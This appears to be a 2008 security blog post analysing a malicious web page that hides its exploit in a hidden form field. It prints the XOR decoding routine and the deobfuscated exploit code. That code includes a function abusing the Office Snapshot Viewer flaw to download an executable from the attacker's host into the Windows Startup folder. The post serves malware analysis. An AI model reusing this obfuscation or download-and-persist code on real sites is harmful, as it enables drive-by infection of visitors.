marco
blog
Menu:
DOM-based obfuscation in malicious JavaScript
October 15, 2008
A few weeks ago, the good folks of Malware Domain List pointed out an interesting new obfuscation technique being used by some malicious JavaScript samples.
Here's the code of the malicious page (from reddii.ru):
<html><body><input type='text'style='display:none'id='vimamikolu2'
value='kekin1=new Array(161,244,251,239,252,240,248,189,238,239,254,
...
166,144,151,161,178,238,254,239,244,237,233,163);'/>
<script>votot=function(str){document.write(str);};
dotemerape7=new String();
lifum=Math.round(-80.131*Math.SQRT1_2-16.601*Math.LOG2E+342.801*Math.LN2);
eval(document.getElementById('vimamikolu2').value);
for(pidum9=0;pidum9<1577;pidum9++)
dotemerape7+=String.fromCharCode(kekin1[pidum9]^lifum);
votot(dotemerape7);
</script></body></html>
As it's typically done, this code just acts as the decoding routine for
the actual exploit code, which is obfuscated. However, in this case, the
obfuscated code is stored and dynamically retrieved from the HTML code
surrounding the JavaScript code. More precisely, the decoding routine
retrieves the value of the attribute value of the HTML element with id
vimamikolu2. This string is evaluated via eval: this defines the
array kekin1. Then, the code applies String.fromCharCode to each
element of the array (xored with a constant value), and writes the
result back to the page.
While not particularly difficult to reverse manually, this deobfuscation technique has an important consequence for deobfuscation and analysis tools: they need to have a decent implementation of the DOM model (e.g., understand the getElementById function) in order to automatically get around this kind of tricks. Incidentally, I'm working on one such tool (which handles this sample just fine) and should have something ready (and releasable) soon: check back!
The deobfuscated code reveals the usual exploit for the MDAC vulnerability and a more interesting (and recent) exploit for the Office Snapshot Viewer vulnerability (CVE-2008-2463):
function goMDAC() {
...
}
function goPDF() {
wnd=window;
while (wnd.parent!=wnd)
wnd=wnd.parent;
wnd.location="getfile.php?f=vispdf";
}
function goSnap() {
var sfrom = 'http://reddii.ru/traffic/sploit1/getexe.php?h=12';
var sto = 'c:/Documents and Settings/All Users/Start Menu/Programs/Startup/'
+'svchost.exe';
try {
snapattack.SnapshotPath = sfrom;
snapattack.CompressedPath = sto;
snapattack.PrintSnapshot(sfrom,sto);
} catch(e) {}
}
setTimeout('goMDAC();',3500);
setTimeout('goPDF();',5000);
goSnap();
Another interesting aspect of this exploit is that it (also) tries to download PDF files. But this is material for another post...
To leave a comment, complete the form below. Mandatory fields are marked *.